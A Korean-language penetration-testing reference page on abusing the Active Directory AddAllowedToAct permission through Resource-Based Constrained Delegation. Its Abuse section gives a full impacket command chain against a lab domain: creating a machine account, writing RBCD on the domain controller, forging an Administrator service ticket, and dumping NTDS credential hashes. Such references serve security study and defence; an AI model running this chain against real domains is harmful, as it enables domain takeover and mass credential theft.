AddAllowedToAct

AddAllowedToAct 권한은 Kerberos 프로토콜에 대해서 리소스 기반의 제약된 위임을 할 수 있는 권한입니다. RBCD를 비롯하여 Delegation의 종류 3가지는 모두 컴퓨터에 있는 리소스를 주체로 하여금 제약 위임 목록을 관리하는 시스템이라 컴퓨터 계정에 국한하여 BloodHound로부터 이 관계를 확인할 수 있습니다. RBCD는 Resource-Based Constrained Delegation으로 자세한 설명은 을 참조합니다.

이 권한을 직접 설정하기 위해서는 설정을 원하는 컴퓨터 계정의 Properties > Security > User > Write msDS-AllowedToActOnBehalfOfOtherIdentity 속성을 체크 표시로 변경합니다.

권한이 있을 때 공격자는 타겟 머신의 RBCD를 허가할 계정을 등록해야 합니다. 이때 MAQ 값이 1 이상인 경우 직접 장악한 계정으로부터 새로운 머신 계정을 생성하여 생성한 머신을 RBCD를 통해 제약 위임 권한을 등록하여 머신을 통해서 다른 사용자의 TGT를 발급받을 수 있습니다. 하지만 MAQ 값이 0이라고 하더라도 장악한 계정을 RBCD에 등록하여 사용 가능합니다.

Abuse

권한을 악용하기 위해서는 타겟 머신의 RBCD에 허용할 머신 계정을 등록해야 합니다. 장악한 머신 계정이 없다면 MAQ 값이 1 이상인 도메인 계정을 이용하여 머신 계정 생성 후, RBCD를 구성합니다.

# 새로운 머신 계정 생성
impacket-addcomputer -computer-name 'ATTACK$' -computer-pass 'Password123!' -dc-host DC01.PENTEST.LOCAL 'PENTEST.LOCAL/victim:Password123!'

# 타겟의 RBCD에 계정 등록
impacket-rbcd -delegate-from 'ATTACK$' -delegate-to 'DC01$' -action 'write' 'PENTEST.LOCAL/victim:Password123!'

# 등록된 계정을 통해 TGT 발급
impacket-getST -spn cifs/DC01.PENTEST.LOCAL -impersonate Administrator 'PENTEST.LOCAL/ATTACK$:Password123!'
export KRB5CCNAME=Administrator.ccache

# NTDS 덤핑
crackmapexec smb PENTEST.LOCAL -u Administrator --use-kcache --ntds

References